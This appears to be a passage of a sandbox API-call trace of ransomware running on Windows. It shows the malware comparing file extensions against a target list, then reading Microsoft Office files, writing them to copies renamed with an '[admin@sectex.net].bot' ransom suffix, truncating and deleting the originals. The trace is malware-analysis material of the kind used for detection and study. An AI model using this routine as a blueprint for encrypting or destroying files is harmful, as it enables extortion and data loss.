	[0148.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.774] lstrlenW (lpString=".doc") returned 4
	[0148.774] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.774] lstrlenW (lpString=".docx") returned 5
	[0148.774] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.774] lstrlenW (lpString=".pdf") returned 4
	[0148.774] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.774] lstrlenW (lpString=".xls") returned 4
	[0148.774] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.775] lstrlenW (lpString=".xlsx") returned 5
	[0148.775] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.775] lstrlenW (lpString=".ppt") returned 4
	[0148.775] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString=".zip") returned 4
	[0148.775] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.775] lstrlenW (lpString=".rar") returned 4
	[0148.775] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.775] lstrlenW (lpString=".bz2") returned 4
	[0148.775] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.775] lstrlenW (lpString=".7z") returned 3
	[0148.775] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString=".dbf") returned 4
	[0148.775] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString=".1cd") returned 4
	[0148.775] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString=".jpg") returned 4
	[0148.775] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.775] lstrlenW (lpString=".doc") returned 4
	[0148.775] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.775] lstrlenW (lpString=".docx") returned 5
	[0148.775] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.775] lstrlenW (lpString=".pdf") returned 4
	[0148.775] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.776] lstrlenW (lpString=".xls") returned 4
	[0148.776] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.776] lstrlenW (lpString=".xlsx") returned 5
	[0148.776] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.776] lstrlenW (lpString=".ppt") returned 4
	[0148.776] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.776] lstrlenW (lpString=".zip") returned 4
	[0148.776] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.776] lstrlenW (lpString=".rar") returned 4
	[0148.776] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.776] lstrlenW (lpString=".bz2") returned 4
	[0148.776] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.776] lstrlenW (lpString=".7z") returned 3
	[0148.776] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.776] lstrlenW (lpString=".dbf") returned 4
	[0148.776] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.776] lstrlenW (lpString=".1cd") returned 4
	[0148.776] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
	[0148.776] lstrlenW (lpString=".jpg") returned 4
	[0148.776] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.776] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.776] lstrlenW (lpString="OIS_F_COL.HXK") returned 13
	[0148.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.777] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=114) returned 1
	[0148.777] CloseHandle (hObject=0x3f0) returned 1
	[0148.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk")) returned 0x20
	[0148.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.777] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.778] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.778] GetLastError () returned 0x0
	[0148.778] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.779] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.780] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.780] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0148.780] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.780] CloseHandle (hObject=0x3f4) returned 1
	[0148.780] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.780] SetEndOfFile (hFile=0x3f0) returned 1
	[0148.783] CloseHandle (hObject=0x3f0) returned 1
	[0148.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk")) returned 1
	[0148.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.783] lstrlenW (lpString=".doc") returned 4
	[0148.783] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.784] lstrlenW (lpString=".docx") returned 5
	[0148.784] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.784] lstrlenW (lpString=".pdf") returned 4
	[0148.784] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.784] lstrlenW (lpString=".xls") returned 4
	[0148.784] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.784] lstrlenW (lpString=".xlsx") returned 5
	[0148.784] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.784] lstrlenW (lpString=".ppt") returned 4
	[0148.784] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.784] lstrlenW (lpString=".zip") returned 4
	[0148.784] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.784] lstrlenW (lpString=".rar") returned 4
	[0148.784] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.784] lstrlenW (lpString=".bz2") returned 4
	[0148.784] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.784] lstrlenW (lpString=".7z") returned 3
	[0148.784] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.784] lstrlenW (lpString=".dbf") returned 4
	[0148.784] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.784] lstrlenW (lpString=".1cd") returned 4
	[0148.784] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.784] lstrlenW (lpString=".jpg") returned 4
	[0148.785] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.785] lstrlenW (lpString=".doc") returned 4
	[0148.785] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.785] lstrlenW (lpString=".docx") returned 5
	[0148.785] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.785] lstrlenW (lpString=".pdf") returned 4
	[0148.785] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString=".xls") returned 4
	[0148.785] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString=".xlsx") returned 5
	[0148.785] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.785] lstrlenW (lpString=".ppt") returned 4
	[0148.785] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.785] lstrlenW (lpString=".zip") returned 4
	[0148.785] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString=".rar") returned 4
	[0148.785] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.785] lstrlenW (lpString=".bz2") returned 4
	[0148.785] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.785] lstrlenW (lpString=".7z") returned 3
	[0148.785] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.785] lstrlenW (lpString=".dbf") returned 4
	[0148.785] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.785] lstrlenW (lpString=".1cd") returned 4
	[0148.786] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61
	[0148.786] lstrlenW (lpString=".jpg") returned 4
	[0148.786] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.786] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.786] lstrlenW (lpString="OIS_K_COL.HXK") returned 13
	[0148.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.786] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=113) returned 1
	[0148.786] CloseHandle (hObject=0x3f0) returned 1
	[0148.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk")) returned 0x20
	[0148.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.787] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.787] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.788] GetLastError () returned 0x0
	[0148.788] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.789] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.790] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.790] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0148.790] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.790] CloseHandle (hObject=0x3f4) returned 1
	[0148.790] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.790] SetEndOfFile (hFile=0x3f0) returned 1
	[0148.793] CloseHandle (hObject=0x3f0) returned 1
	[0148.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.793] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk")) returned 1
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString=".doc") returned 4
	[0148.795] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.795] lstrlenW (lpString=".docx") returned 5
	[0148.795] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.795] lstrlenW (lpString=".pdf") returned 4
	[0148.795] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.795] lstrlenW (lpString=".xls") returned 4
	[0148.795] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.795] lstrlenW (lpString=".xlsx") returned 5
	[0148.795] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.795] lstrlenW (lpString=".ppt") returned 4
	[0148.795] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString=".zip") returned 4
	[0148.795] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.795] lstrlenW (lpString=".rar") returned 4
	[0148.795] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.795] lstrlenW (lpString=".bz2") returned 4
	[0148.795] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.795] lstrlenW (lpString=".7z") returned 3
	[0148.795] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString=".dbf") returned 4
	[0148.795] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString=".1cd") returned 4
	[0148.795] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.795] lstrlenW (lpString=".jpg") returned 4
	[0148.795] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.796] lstrlenW (lpString=".doc") returned 4
	[0148.796] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.796] lstrlenW (lpString=".docx") returned 5
	[0148.796] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.796] lstrlenW (lpString=".pdf") returned 4
	[0148.796] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString=".xls") returned 4
	[0148.796] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString=".xlsx") returned 5
	[0148.796] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.796] lstrlenW (lpString=".ppt") returned 4
	[0148.796] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.796] lstrlenW (lpString=".zip") returned 4
	[0148.796] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString=".rar") returned 4
	[0148.796] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.796] lstrlenW (lpString=".bz2") returned 4
	[0148.796] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.796] lstrlenW (lpString=".7z") returned 3
	[0148.796] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.796] lstrlenW (lpString=".dbf") returned 4
	[0148.796] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.796] lstrlenW (lpString=".1cd") returned 4
	[0148.796] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61
	[0148.797] lstrlenW (lpString=".jpg") returned 4
	[0148.797] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.797] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0148.797] lstrlenW (lpString="OMSINTL.DLL") returned 11
	[0148.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.798] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=401792) returned 1
	[0148.798] CloseHandle (hObject=0x3f0) returned 1
	[0148.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll")) returned 0x20
	[0148.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0148.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString=".doc") returned 4
	[0148.799] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString=".docx") returned 5
	[0148.799] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.799] lstrlenW (lpString=".pdf") returned 4
	[0148.799] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString=".xls") returned 4
	[0148.799] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString=".xlsx") returned 5
	[0148.799] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.799] lstrlenW (lpString=".ppt") returned 4
	[0148.799] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString=".zip") returned 4
	[0148.799] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString=".rar") returned 4
	[0148.799] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.799] lstrlenW (lpString=".bz2") returned 4
	[0148.799] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.799] lstrlenW (lpString=".7z") returned 3
	[0148.799] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString=".dbf") returned 4
	[0148.799] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString=".1cd") returned 4
	[0148.799] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.799] lstrlenW (lpString=".jpg") returned 4
	[0148.799] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.800] lstrlenW (lpString=".doc") returned 4
	[0148.800] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString=".docx") returned 5
	[0148.800] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.800] lstrlenW (lpString=".pdf") returned 4
	[0148.800] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString=".xls") returned 4
	[0148.800] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString=".xlsx") returned 5
	[0148.800] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.800] lstrlenW (lpString=".ppt") returned 4
	[0148.800] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59
	[0148.800] lstrlenW (lpString=".zip") returned 4
	[0148.800] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.800] lstrlenW (lpString=".rar") returned 4
